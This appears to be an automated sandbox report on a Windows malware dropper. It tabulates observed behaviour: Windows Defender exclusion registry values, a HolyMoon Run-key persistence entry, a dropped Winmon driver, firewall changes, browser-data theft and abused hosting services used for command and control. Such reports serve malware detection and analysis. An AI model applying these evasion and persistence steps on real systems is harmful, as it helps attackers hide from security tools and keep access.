Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyMoon = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Binary Proxy Execution: Odbcconf

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcconf.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyMoon = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyMoon = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\is-TD94V.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259474200 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-TVQH3.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files (x86)\Gparted\is-PVT77.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20241107052124.cab C:\Windows\system32\makecab.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Gparted\Build.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcconf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
